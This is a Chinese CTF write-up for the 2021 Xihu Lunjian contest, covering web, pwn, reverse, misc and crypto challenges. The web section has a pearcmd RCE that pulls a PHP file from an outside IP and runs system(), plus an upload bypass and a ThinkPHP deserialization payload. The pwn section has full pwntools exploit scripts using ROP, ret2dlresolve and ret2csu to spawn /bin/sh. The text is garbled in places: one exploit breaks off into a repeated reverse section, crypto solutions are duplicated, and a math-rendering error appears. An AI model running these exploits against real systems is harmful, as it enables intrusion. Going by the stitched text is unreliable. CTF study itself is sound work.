2021西湖论剑wp
web
OA?RCE?
⽐赛的时候试了下不是弱⼝令(实际上就是admin123,但当时忘试这个了),所以就去⽹上找了改密码
的⽅式,⽤这⾥的⽅法:信呼oa最新版本代码审计 - ma4ter
$test = $this->jm-
>strlook(json_encode(array("msgtype"=>"editpass","user"=>"admin","pass"=>"lighting")),
'd41d8cd98f00b204e9800998ecf8427e');
echo $test;
拿到31ae15.X3amdiGpSx5aZqNWaq6NSZVut2MjYWm5UmMnRnZ!GZIXUmqvZUmqEnpmbza2h
npdbtg::
然后post传过去,⽤admin/lighting登陆即可
拿到后台权限过后,进⾏源码审计,在indexAction.php处找到可以看phpinfo的地⽅
传值: ?m=index&a=phpinfo ,发现 register_argc_argv 是开着的
同时这处代码可以进⾏⽂件包含
所以可以考虑包含pearcmd来下载⽂件,最后再来包含下载的⽂件
构造
?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2xpYi9waHAvcGVhcmNtZA=
=&+install+-R+/tmp+http://1.14.92.24/1.php
//surl=…/…/…/…/…/usr/local/lib/php/pearcmd
这⾥有⼏个⼩trick,⾸先是源码已经给了php后缀,所以不需要在pearcmd后⾯加php了,再有就是要
进⾏⽬录穿越(多来⼏个穿越路径,否则打不通)
然后去访问⽬录即可,构造:
?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdG1wL3RtcC9wZWFyL2Rvd25sb2F
kLzE=
//surl=…/…/…/…/…/…/…/tmp/tmp/pear/download/1
接着构造1.php
<?php echo "<?php system('/readflag');?>";
?>
打的步骤就还是和上⾯⼀样了,先下载,然后访问即可拿到flag
DASCTF{915aa19ab2d56a9d9340938eb5a01d9e}
easyupload
?source=1看到源码
能上传⽂件有⼀些限制
if(stristr($filename,'p') or stristr($filename,'h') or stristr($filename,'..'))
{die('no');}$file_conents = file_get_contents($_FILES['file']['tmp_name']);if(strlen($file_conents)>28 or stristr($file_conents,'<')){die('no');}
⽂件名不能有p和h,⽽且内容⻓度不超过28。
可以上传.user.ini,因为⻓度不超过28,可以为
auto_prepend_file="/flag"
使其⾃动包含/flag,之后找到⼀个php⽂件访问就⾏。
看latte模版会⽣成⼀个php缓存⽂件,且⽂件⽣成规则如上图,每个版本⽂件名固定。
本地搭环境(要在linux),去github上找latte测试。
简单看⼀下 加密规则为key的md5结果前⼗位
a:4:{i:0;s:19:“tempdir/index.latte”;i:1;s:6:“版本号”;i:2;a:7:
{i:0;s:5:“clamp”;i:1;s:11:“divisibleBy”;i:2;s:4:“even”;i:3;s:5:“first”;i:4;s:4:“last”;i:5;s:3:“odd”;i:6;s:5:"slice
";}i:3;b:1;}
所以⽣成缓存⽂件名为index.latte–key加密结果.php
之后在尝试2.10.4的时候有了结果,⽂件名为index.latte–6f26bb0dba.php
回到题⽬,构造⼀个传⽂件html
<!DOCTYPE html>
<html lang="en"> <head><meta charset="UTF-8"><title>Title</title>
</head> <body> <h1>hello worlds</h1> <form action="http://2e878d38-86e3-4b65-9b17-928e7ded6d0a.ezuploadctf.dasctf.com:2333/" method="post" enctype="multipart/form-data"><p><input type="file" name="file"></p><p><input type="submit" value="submit"></p>
</form>
</body>
</html>
先发包
POST / HTTP/1.1
Host: 2e878d38-86e3-4b65-9b17-928e7ded6d0a.ezupload-ctf.dasctf.com:2333
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------------------------
-165383841511425975052999558491
Content-Length: 260
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Upgrade-Insecure-Requests: 1
-----------------------------165383841511425975052999558491
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: application/octet-stream
auto_prepend_file="/flag"
-----------------------------165383841511425975052999558491--
之后访问/tempdir/index.latte–6f26bb0dba.php
DASCTF{a3cb921465600f49b52b9ac907a38edb}
灏妹的web
扫就完事了,访问/.idea/dataSources.xml
DASCTF{09957769e7c24dddefc1ef615539c9ac}
EasyTp
有个file参数,直接读/etc/passwd提示harcker,伪协议读源码
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{public function index(){if (isset($_GET['file'])) {$file = $_GET['file'];$file = trim($file);$file = preg_replace('/\s+/','',$file);if(preg_match("/flag/i",$file)){ die('<h2> no flag..');}if(file_exists($file)){echo "file_exists() return true..</br>";die( "hacker!!!");}else {echo "file_exists() return false..";@highlight_file($file);}} else {echo "Error! no file parameter <br/>";echo "highlight_file Error";}}public function unser(){if(isset($_GET['vulvul'])){$ser = $_GET['vulvul'];$vul = parse_url($_SERVER['REQUEST_URI']);parse_str($vul['query'],$query);foreach($query as $value){if(preg_match("/O/i",$value)){die('</br> <h1>Hacking?');exit();}}unserialize($ser);}}
}
有个反序列化,要绕parse
https://www.cnblogs.com/tr1ple/p/11137159.html
绕过⽅法///public/index.php/index/unser?vulvul=
绕过之后⽹上找条链⼦就⾏
<?php
namespace think\model\concern{trait Attribute{private $data = [7];}
}
namespace think\view\driver{class Php{}
}
namespace think{abstract class Model{use model\concern\Attribute;private $lazySave;protected $withEvent;protected $table;function __construct($cmd){$this->lazySave = true;$this->withEvent = false;$this->table = new route\Url(new Middleware,new Validate,$cmd);}}class Middleware{public $request = 2333;}class Validate{protected $type;function __construct(){$this->type = ["getDomainBind" => [new view\driver\Php,'display']];}}
}
namespace think\model{use think\Model;class Pivot extends Model{}
}
namespace think\route{class Url{protected $url = 'a:';protected $domain;protected $app;protected $route;function __construct($app,$route,$cmd){$this->domain = $cmd;$this->app = $app;$this->route = $route;}}
}
payload
///public/index.php/index/unser?vulvul=
O%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel%00la
zySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00% 2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%0
0url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A26%3A%22%3C%
3Fphp+system%28%22cat+%2F%2A%22%29%3B+%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3B O%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bi%3A2333%3B% 7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A7
%3A%22%00%2A%00type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi
%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%
22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7B i%3A0%3Bi%3A7%3B%7D%7D
DASCTF{ee6db14d381babe4f78be657ee473cba}
pwn
string_go
思路
通过计算器算出的答案为3进⼊lative_func函数,发现通过输⼊负数可以溢出吐出地址leak libc基地址,
再通过memcpy函数进⾏栈溢出
然后就是基本的栈溢出构造rop链进⾏攻击
exp
#coding=utf-8
from pwn import *
context(log_level='debug',arch='amd64')
binary='./string_go'
main_arena = 0x3ebc40
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+"==>"+hex(addr))
local = 1
if local == 1:io=process(binary)
else:io=remote('82.157.20.104',50100) e=ELF(binary)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ru('>>> ')
sl('1+2')
#gdb.attach(io)
ru('>>> ')
sl('-2')
ru('>>> ')
sl('a')
ru('>>> ')
sl('1')
io.recv(0x28)
libc_base=u64(io.recv(8))-0x730157
io.recv(8)
canary=u64(io.recv(8))
su('canary',canary)
system = libc_base+libc.symbols['system']
binsh = libc_base+next(libc.search(b'/bin/sh'))
ret = libc_base+next(libc.search(asm('ret')))
pop_rdi = libc_base+next(libc.search(asm('pop rdi\nret')))
#gdb.attach(io)
sl(b'a'*0x18+p64(canary)+p64(0)*3+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system))
shell()
blind
思路
栈溢出,但是没有输出函数,⼀开始⽤ret2dlreslove来写,能leak地址把能⽤的libc都⽤了,后⾯发现匹
配的libc都⽆效,尝试了⼏次⽆果放弃,找新思路,附上原来的exp。
在这里插入代码片
#coding=utf-8
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64')
binary='./blind'
main_arena = 0x3ebc40
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+"==>"+hex(addr))
local = 0
if local == 1:io=process(binary)
else:io=remote('82.157.6.165',27200)
elf=ELF(binary)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
one_gadget = [0x4f3d5,0x4f432,0x10a41c]
read_plt = elf.plt['read']
read_got = elf.got['read']
fun_addr = 0x4006B6
'''
Gadgets information
============================================================
0x00000000004007bc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007be : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007c0 : pop r14 ; pop r15 ; ret
0x00000000004007c2 : pop r15 ; ret
0x00000000004007bb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007bf : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400620 : pop rbp ; ret
0x00000000004007c3 : pop rdi ; ret
0x00000000004007c1 : pop rsi ; pop r15 ; ret
0x00000000004007bd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400549 : ret
'''
# bss
bss = elf.bss()
l_addr = libc.sym['write'] - libc.sym['read']#libc.sym['system'] -
libc.sym['read']
r_offset = bss + l_addr * -1
if l_addr < 0:l_addr = l_addr + 0x10000000000000000
pop_rdi = 0x00000000004007c3
# pop rsi ; pop r15 ; ret
pop_rsi = 0x00000000004007c1
plt_load = 0x400556
payload = b'a' * 0x58 + p64(pop_rsi) + p64(bss + 0x100) + p64(0) + p64(pop_rdi) + p64(0) + p64(read_plt) + p64(fun_addr)
raw_input()
sleep(1)
io.sendline(payload)
dynstr = 0x4003B8
fake_link_map_addr = bss + 0x100
fake_dyn_strtab_addr = fake_link_map_addr + 0x8
fake_dyn_strtab = p64(0) + p64(dynstr) # fake_link_map_addr + 0x8
fake_dyn_symtab_addr = fake_link_map_addr + 0x18
fake_dyn_symtab = p64(0) + p64(read_got - 0x8) # fake_link_map_addr + 0x18
fake_dyn_rel_addr = fake_link_map_addr + 0x28
fake_dyn_rel = p64(0) + p64(fake_link_map_addr + 0x38) # fake_link_map_addr +
0x28
fake_rel = p64(r_offset) + p64(0x7) + p64(0) # fake_link_map_addr + 0x38
fake_link_map = p64(l_addr)
fake_link_map += fake_dyn_strtab
fake_link_map += fake_dyn_symtab
fake_link_map += fake_dyn_rel
fake_link_map += fake_rel
fake_link_map = fake_link_map.ljust(0x68, b'\x00')
fake_link_map += p64(fake_dyn_strtab_addr)
fake_link_map += p64(fake_dyn_symtab_addr) # fake_link_map_addr + 0x70
fake_link_map += b'/bin/sh'.ljust(0x80, b'\x00')
fake_link_map += p64(fake_dyn_rel_addr)
sleep(1)
io.sendline(fake_link_map)
sleep(1)
#gdb.attach(io)
#raw_input()
sleep(4)
rop = b'A' * 0x58 + p64(pop_rdi) +p64(1)+p64(pop_rsi)+ p64(0x601018) + p64(0) +p64(plt_load) + p64(fake_link_map_addr) + p64(0)+p64(fun_addr)
io.sendline(rop)
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('alarm',leak)
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('read',leak)
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('__libc_start_main',leak)
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('setvbuf',leak)
libc = LibcSearcher('setvbuf', leak)
libc_base = leak - libc.dump('setvbuf')
leak = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
su('sleep',leak)
pay = b'a'*0x58 + p64(pop_rdi) + p64(fake_link_map_addr + 0x78) + p64(libc_base
+ libc.dump('system'))
sl(pay)
io.interactive()
通过leak出的地址下⼿,发现在alarm附近有syscall调⽤
尝试通过ret2csu部分修改alarm的got表(最后1字节改为原来偏移加上5即\xd5)得到syscall,通过
read控制寄存器rax为0x3b调⽤号,布置参数拿到shell
exp
from pwn import *
#from LibSearcher import *
context.log_level = "debug"
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+"==>"+hex(addr))
local = 1
if local == 1:io=process("./blind")
else:io=remote('82.157.6.165',27200)
#libc = ELF("")
elf = ELF("./blind")
def gadget(addr,di,si,dx):bx=0bp=1r12=addrr13=dxr14=sir15=dipay=p64(0x4007BA)+p64(bx)+p64(bp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)+p64(0x400
7A0)+b'a'*7*8return pay
gdb.attach(io)
pop_rdi = 0x00000000004007c3
pop_rsi_r15 = 0x00000000004007c1
payload = b"a" * 0x58
payload += gadget(elf.got["read"],0,elf.got["alarm"],1)
REVERSE
虚假的粉丝
歌能听,IDA直接看算法,很容易看出,读⼊⽂件是由第⼀次输⼊内容决定,读取偏移是第⼆次决定,读
取⼤⼩是第三次决定
payload += gadget(elf.got["read"],0,0x601088,0x3b)
payload += gadget(elf.got["alarm"],0x601088,0,0)
payload += (0x500 - len(payload)) * b"\x00"
s(payload) s("\xd5") s("/bin/sh\x00" + "a" * (0x3b-8))
shell()
REVERSE
虚假的粉丝
歌能听,IDA直接看算法,很容易看出,读⼊⽂件是由第⼀次输⼊内容决定,读取偏移是第⼆次决定,读
取⼤⼩是第三次决定
算法实际上就是⼀个整数转⻓度为4⽂本的过程,⽐如1就转为0001,40转为0040,⽽读取⼤⼩很容易
看出来是》=40,我默认为40
⾄于偏移,则要找到那个⽂件,题⽬为了满⾜条件,⽂件应该是唯⼀的,写⼀个脚本来跑吧
⾸先要满⾜有U和S,先不管那么多,把有这两个字符串的⽂件给弄出来
很幸运的是,只有⼀个⽂件满⾜:“ASCII-faded 4157.txt”
直接⽤⼯具去看,算好偏移0x45E
⾄此得出3个数字
4157
1118
40
这⼀段只需要满⾜第⼀个字符为A,第11个字符为S即可
剩下的就是位或和装逼放⾳乐
解码
得到 S3Cre7_K3y = Al4N_wAlK3R,把key输⼊进去然后就开始放⾳乐,然后去看5315.txt
把它缩放就出来了,A_TrUe_AW_f4ns
gghdl
先下个断点动态调试,发现⽐较加密结果,发现是逐字节加密,并且猜出位或的常数:0x9C
Dump出数据,直接写脚本解密
解出flag:06291962-abad-40c8-8318-f0a6b186482c
TacticalArmed
IDA F5,只能判断出字符串⻓度是0x28,以及循环次数,加密算法不得⽽知
⽤OD进⾏调试,发现是⼀个⽐较特殊的smc
由此,可以猜出,图下函数是计算将要执⾏的代码,并写⼊,因为是个循环,所以会覆盖上次的写⼊,
图下是⼀个代码拼接的过程
当然我选择了逃课,使⽤动态调试,让他⾃解码,然后收集算法段的所有汇编代码,在将收集好的汇编
代码,写⼊原函数
我⽐较喜欢偷懒,是这样做的,只dump出来了⼀次循环的算法段,然后写⼊,修复了部分jcc,然后保
存,丢IDA看算法
看结构,不难发现是Tea算法,⽽405000之类的可以通过动态得到,坑点在于sum,他并不会刷新sum,
会保留上次计算后的sum,所以写脚本时要注意sum
脚本如下
ROR
IDA直接看,逻辑⼀⽬了然,很容易看出来,位移位数是⼀个固定序列,通过动态调试可以确定
加密是8个字节⼀组进⾏分组加密
假设密⽂是 m1,m2,m3,m4,m5,m6,m7,m8 共8个字节
则明⽂的第n(0=<n<=8)个字节则是将每个密⽂的第n取出来,依次倒叙放置在⼆进制位
这样说或许有点抽象,直接上脚本
Misc
真·签到
YUSA的⼩秘密
这题跟去年的ByteCTF的 Hardcore Watermark 01 ⼏乎⼀模⼀样,官⽅wp链
接:
https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#
这题采⽤的不是RGB通道的LSB隐写,⽽是采⽤的YCrCb通道。通过 cv2.cvtColor(img,
cv2.COLOR_BGR2YCrCb) 对 img 图⽚数据进⾏⾊彩空间转换,即可得到三个通道的数据,然后对三个通
道的数据分别根据奇偶做⼆值化处理并保存为图⽚
cv.imwrite('a.png', (a % 2) * 255) #对三个通道中的数据分别根据奇偶做⼆值化处理,并分
别保存为图⽚
cv.imwrite('b.png', (b % 2) * 255)
cv.imwrite('c.png', (c % 2) * 255)
所以完整脚本如下:
from cv2 import *
import cv2 as cv
img=cv2.imread('C:\\Users\\YiJiale\\Desktop\\yusa\\yusa.png')
src_value=cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb) a, b, c = cv.split(src_value) #使⽤cv.split分离通道
cv.imwrite('a.png', (a % 2) * 255) #对三个通道中的数据分别根据奇偶做⼆值化处理,并分
别保存为图⽚
cv.imwrite('b.png', (b % 2) * 255)
cv.imwrite('c.png', (c % 2) * 255)
运⾏后会得到三个通道的图⽚,在其中 a.png 即可清晰看到flag
DASCTF{2947b683036d49e5681f83f7bc3fbb34}
Yusa的秘密
下载附件,发现这是⼀个内存取证的题⽬,先⽤命令获取⼀下 内存镜像的进程
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 psxview
这些进程都分析了⼀下,发现有StikyNot.exe进程,这是windows的便签程序,可以尝试寻找snt⽂件来
查看便签的内容。这⾥就直接来⽤filescan查找⽂件,⽤windows的findstr命令筛选⼀下,先查看下压
缩包
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 filescan | findstr /r 'zip'
有⼀个 key.zip 。直接使⽤命令dump下来,重命名为1.zip
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003f3356f0 -D
C:\Users\YiJiale\Desktop\取证
⾥⾯是⼀个exp⽂件,但是压缩包加密了,需要寻找密码
刚刚查找进程提到过便签的进程,这⾥来尝试查找⼀下snt⽂件
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 filescan | findstr /r "snt"
发现了便签⽂件,我们将他dump下来查看
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003fb306e0 -D
C:\Users\YiJiale\Desktop\取证
将其重命名为 StickyNotes.snt ,⽤记事本打开是看不到上⾯东⻄的,既然数win7的便签,我们就将
其传⼊win7虚拟机尝试打开(这⾥因为VMware tools始终⽆法装上,便采⽤QQ传输⽂件),后来发现 家
庭普通版的Win7居然没有便签这个程序,我是Win11,没有便签程序,于是我尝试下Win10虚拟机
将snt⽂件放⼊C:\Users\YiJiale\AppData\Roaming\Microsoft\Sticky Notes\路径下,然后打开便签程
序,便可以得到
得到了⼀个密码: 世界没了⼼跳
⽤这个密码成功打开刚刚的exp的压缩包,得到exp⽂件
from PIL import Image
import struct
pic = Image.open('key.bmp')
fp = open('flag', 'rb')
fs = open('Who_am_I', 'wb') a, b = pic.size
list1 = []
for y in range(b):for x in range(a):pixel = pic.getpixel((x, y))list1.extend([pixel[1], pixel[0], pixel[2], pixel[2], pixel[1],
pixel[0]])
data = fp.read()
for i in range(0, len(data)):fs.write(struct.pack('B', data[i] ^ list1[i % a*b*6]))
fp.close()
fs.close()
通过分析exp可以发现,⽬前还缺少两个⽂件便可以得到flag⽂件,分别是Who_am_I和key.bmp⽂件
这⾥Who_am_I,既然是Yusa的秘密,那⽤户应该就是Yusa了,使⽤命令来获取⼀下⽤户名的hash密码
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 hashdump
使⽤ Passware Kit 13 来破解Yusa⽤户的密码
打开软件,点击 Memory Analysis 功能,再选择 Windows User 功能
发现得到了密码为: YusaYusa520
成功打开了Who_am_I的压缩包得到了Who_am_I⽂件,题⽬描述中出现了Sakura组织,所以这⾥也查
找⼀下相关⽂件
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 filescan | findstr /r "Sakura"
这⾥得到的部分结果含有中⽂,在Windows⾥就乱码了,不过不影响,我们dmup⼀下第⼀个⽂件
Sakura-didi ,并且重命名为2.zip
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e58ada0 -D
C:\Users\YiJiale\Desktop\取证
打开压缩包,⾥⾯确实是key.bmp⽂件,但是还是需要密码,接下来就只需要去找密码了
联想到⼀开始分析进程的时候,除了便签程序,还有⼀个平时很少遇到过的 wab.exe ,这是通讯录的程
序,我们试着找⼀下其中的联系⼈,联系⼈contact⽂件,⽤filescan搜索⼀下
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 filescan | findstr /r "contact"
⼀共得到了两个联系⼈的⽂件,分别是Yusa.contact和Mystery Man.contact
我们分别dump下来分析⼀下
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e748f20 -D
C:\Users\YiJiale\Desktop\取证
vol.exe -f Yusa-PC.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003fa09070 -D
C:\Users\YiJiale\Desktop\取证
打开⾥⾯是base64编码,解码得到⼀张Yusa的bmp图⽚
但这并不是我们想要的东⻄,接着看另⼀个联系⼈⽂件
发现是base32编码,后⾯还有⼀段base,接着解密
得到了key: 820ac92b9f58142bbbc27ca295f1cf48 ,这应该就是key.bmp的密码了
成功得到了,接着把⽂件都跟刚刚的exp放同⼀个⽬录下尝试运⾏
运⾏完成后,并没有看到flag,后来发现,flag跟Who_am_I⽂件需要在exp中互换⼀下位置
因为刚刚运⾏了⼀下导致Who_am_I为空了,所以这⾥重新导⼊Who_am_I⽂件,运⾏⼀下,得到了⼀张
gif图,我们改⼀下后缀,发现是在放烟花
逐⼀分帧查看后得到了flag
DASCTF{c3837c61-77f1-413e-b2e6-3ccbc96df9f4}
Cry
HardRSA
原题为2020⽺城杯power,这题只是改了下数据
参照blog:https://blog.csdn.net/qq_52193383/article/details/120417567
由于需要解出p,于是将d*ep-1的因数都放在列表中进⾏爆破得出即可
from Crypto.Util.number import *
import sympy
e = 0x10001
dp =
3794769731581465508310049527476439944399404356564837722690130815805325396401890
20020958796514224150837680366977747272291881285391919167077726836326564473
c =
5724825894592738767357946734810611874703438119070377786140952733627291455969949
0353325906672956273559867941402281438670652710909532261303394045079629146156340
8019322548390215741399439334519240628884267263532307572845828639932275927033231
3326518041438206213258052665820571621804636624765388176465889131559260719435573
3209493239611216193118424602510964102026998674323685134796018596817393268106583
7371535166329690416932807252979292777511360405468302305338985146597147172133716
1985313727251596706700880552105161310714155578851689422365485127778539335517811
4230929014037436770678131148140398384394716456450269539065009396311996040422853
7400495085005402814881712852334457447996800223071804522107939136141316468759496
98079917313572873073033804639877699884489290120302696697425
c1 =
7810013146187228561342624432273750214721948510879913097520242963804285948813693
3783498210914335741940761656137516033926418975363734194661031678516857040723532
0554486959288206240944004814649501811266384562346698149824112709856502092456877
6559548373887697557252127696314954265918768007591732230851216390442329738163553
2771690434016589132876171283596320435623376283425228536157726781524870348614983
1164088150882576097885179868106225059615388128899531856842564695403698098631039
4832644409071516135119822916319013090366187463102030448184271508610424399880838
2859633753938512915886223513449238733721777977175430329717970940440862059204518
2241267928229121414792607912323125447483014126362224988416767422083906223530226
6832080920131272493686216735070982358187072283132940635901029312101976416001631
6259432749291142448874259446854582307626758650151607770478334719317941727680935
2438203131448298260819555397785705652329354632011351100498612044322850600292372
2951829729167911416526580886286282721119371115915299242713317617779604598157275
8903474465179346029811563765283254777813433339892058322013228964103304946743888
2130683976725408632608833146654920887935547756746109946395372635882760769929077
3515370200200100538332144297409762678669989599354458157245747643785377879488894
5238622869401634353220344790419326516836146140706852577748364903349138246106379
9546470025570911314756692959971964845481995073354214995569859491391626395606229
73283109342746186994609598854386966520638338999059
pd=e*dp-1
#pd的因数
x1 = 2*2*2
x2 = 5*5*5
x3 = 11#4
x4 = 41#14
x5=1601
x6=
3444324900854018691451375538323794920803430274540022378363067197129200160431751
7467760001228656574360327813700999822705311707622772084593433128231017
ff=[2,4,8,5,25,123,11,41,1601]
'''for i in ff:for j in ff:for k in ff:if sympy.isprime(pd // i// j // k + 1)==True:print(i,j,k)break''' #爆破得出为2,25,41
flag
###
密码⼈集合
直接nc上去,得到⼀副矩阵,上⾯有 我要拿⻄湖论剑第⼀ 的字样,看起来很像数独游戏
p = pd//41//2//25 + 1 d=dp
k = 0
while True:d = dp + k * (p-1)m = pow(c,d,p)flag = long_to_bytes(m)if b'DAS' in flag or b'flag' in flag:print(flag)breakk += 1 #flag:DASCTF{98d923h4344e3bf72f8775xy65tvftv5}
DASCTF{98d923h4344e3bf72f8775xy65tvftv5}
密码⼈集合
直接nc上去,得到⼀副矩阵,上⾯有 我要拿⻄湖论剑第⼀ 的字样,看起来很像数独游戏
把 我要拿⻄湖论剑第⼀ 转化为 1-9 的数字,找⼀个在线⽹站填上去
在线⽹址:https://shudu.gwalker.cn/
得到结果后,按照先读⼩⽅格再读⼤⽅格的顺序依次写出来,得到
6291534784572683911839475263159467828461729352793586145618942377895236144327618
95
然后再把这些数字按照刚刚的转换顺序,再转回汉字,写个⼩脚本
num= [6,2,9,1,5,3,4,7,8,4,5,7,2,6,8,3,9,1,1,8,3,9,4,7,5,2,6,3,1,5,9,4,6,7,8,2,8,4,6, 1,7,2,9,3,5,2,7,9,3,5,8,6,1,4,5,6,1,8,9,4,2,3,7,7,8,9,5,2,3,6,1,4,4,3,2,7,6,1,8,9,5]
for i in num:if i == 1:print('我',end='')if i == 2:print('要',end='')if i == 3:print('拿',end='')if i == 4:print('⻄',end='')if i == 5:print('湖',end='')if i == 6:print('论',end='')if i == 7:print('剑',end='')if i == 8:print('第',end='')if i == 9:print('⼀',end='')
运⾏得到
论要⼀我湖拿⻄剑第⻄湖剑要论第拿⼀我我第拿⼀⻄剑湖要论拿我湖⼀⻄论剑第要第⻄论我剑要⼀拿湖要剑
⼀拿湖第论我⻄湖论我第⼀⻄要拿剑剑第⼀湖要拿论我⻄⻄拿要剑论我第⼀湖
把这个粘贴回虚拟机⾥,Enter⼀下,即可得到flag
DASCTF{043d3b517abe53a8c8a815e56e9cda6f}
unknown_ds
⼀道DSA的题⽬,给了相关的r和s,但是没有给hm1和hm2,所以我们要从后⾯去求得hm1和hm2,再
来对前⾯进⾏判断。
先看main函数,我们知道:
ul[i]2-wl[i]vl[i]2=1
且我们已知wl[i],搜索x2−cy2=1x^2-cy^2=1x2−cy2=1知道这个东⻄叫佩尔⽅程,它的所有解由基本解构成,⽹上找了求
基本解的脚本的⽹站
⽤这个脚本跑出三个wl[i]的基本解,我们猜测这个ul[i],vl[i]不会太⼤(佩尔⽅程⼏⼗项后⾯的数字将会
爆炸),所以我们对于每个wl[i]爆破⼆⼗五项可能的解,并通过扩展中国剩余定理求得KaTeX parse error: Undefined control sequence: \ at position 13: m_1^e \ mod \̲ ̲ul[0]ul[1]ul[2]以及m2emodvl[0]vl[1]vl[2]m_2^e \ mod \ vl[0]vl[1]vl[2]m2e mod vl[0]vl[1]vl[2]的值,尝试对这两个值直接开e次⽅,得到
m1,m2。
假设(p-1)//q=d,我们容易知道,⼤概率有p//q=d,并且d⾮常⼤,这就说明q相对来说⽐较⼩,所以p近
似等于dq,dq*q=n,q≈(n//d)^1/2,开根后得q,然后得p,求得
- P.q之后按DSA签名步骤解密即可
Exp
from sympy import sqrt
from Crypto.Util.number import *
from fractions import Fraction as Frac
from Crypto.Hash import SHA
from functools import reduce
def gcd(a, b):if b==0: return areturn gcd(b, a%b)
def lcm(a, b):return a * b // gcd(a,b)
def exgcd(a, b):if b==0: return 1, 0x, y = exgcd(b, a%b)return y, x - a//b*y
def uni(P, Q):r1, m1 = Pr2, m2 = Qd = gcd(m1, m2)assert (r2-r1) % d == 0l1, l2 = exgcd(m1//d, m2//d)return (r1 + (r2-r1)//d*l1*m1) % lcm(m1, m2), lcm(m1, m2)
def CRT(eq):return reduce(uni, eq)
def continued_fraction(n):a = sqrt(n)while True: • yield (int(a))
• a = 1 / (a - int(a))
def pell(n):if int(sqrt(n))**2 == n: • return (1, 0)l = []for i in continued_fraction(n):
• a = Frac(i) • for j in l[::-1]:
• a = j + 1 / a • if a.numerator**2 - n * a.denominator**2 == 1: • return (a.numerator, a.denominator) • l.append(i)
return l
wl=[3912956711, 4013184893, 3260747771]
xl=[]
yl=[]
R1, S1, S2=498841194617327650445431051685964174399227739376,
376599166921876118994132185660203151983500670896,
